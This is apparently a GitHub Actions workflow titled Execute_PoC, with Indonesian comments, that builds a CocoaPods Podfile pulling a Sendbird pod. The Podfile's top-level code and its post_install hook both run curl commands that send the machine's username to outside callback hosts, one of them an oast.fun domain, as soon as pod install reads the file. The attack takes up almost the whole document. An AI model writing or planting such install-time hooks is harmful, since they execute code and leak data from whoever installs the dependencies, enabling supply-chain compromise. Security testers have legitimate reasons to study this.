name: Execute_PoC
on: [push, workflow_dispatch]

jobs:
  test-macos:
    runs-on: macos-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Setup Force-Execution Pod Test
        run: |
          mkdir -p TrialRun
          cd TrialRun
          
          git config --global user.email "researcher@test.com"
          git config --global user.name "Researcher"

          # Tulis Podfile dengan TOP-LEVEL EXECUTION
          # Kode Ruby di luar blok 'target' akan langsung jalan saat 'pod install' dipanggil
          cat <<EOF > Podfile
          # TRIGGER LANGSUNG SAAT PODFILE DIBACA
          puts "[!] INITIALIZING ATTACK PROBE..."
          system("curl -v http://LINK-OAST-LU-DISINI.com/INIT_$(whoami)")

          install! 'cocoapods', :integrate_targets => false

          source 'https://github.com/sendbird/sendbird-ios-distribution.git'
          source 'https://cdn.cocoapods.org/'

          platform :ios, '15.0'

          target 'PoCSimulation' do
            use_frameworks!
            pod 'SendbirdAIAgentMessenger', '>= 1.13.0'
          end

          post_install do |installer|
            puts "[!] POST-INSTALL TRIGGER..."
            system("curl -v http://zgaonaqfeajfjxvuunah5i7blu0wsevoe.oast.fun/POST_$(whoami)")
          end
          EOF

      - name: Execution & Hijack Proof
        run: |
          cd TrialRun
          # Paksa verbose buat liat output puts
          pod install --repo-update --verbose
